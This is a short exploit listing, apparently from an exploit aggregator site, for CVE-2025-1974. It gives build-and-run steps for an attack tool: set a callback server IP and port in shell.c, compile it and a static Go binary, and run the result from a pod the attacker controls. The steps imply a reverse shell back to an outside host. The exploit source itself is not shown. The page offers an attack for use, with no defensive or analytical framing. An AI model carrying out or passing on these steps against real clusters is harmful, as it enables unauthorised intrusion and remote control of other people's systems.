## https://sploitus.com/exploit?id=B312A45F-030A-53D2-8F50-E1FE6B5ED987
Exploit CVE-2025-1974 with a single file.
Usage:
```
1. change server_ip and server_port in shell.c
2. make
3. GOOS=linux go build -ldflags="-w -s -extldflags "-static"" -trimpath main.go
4. run main in your controlled pod
```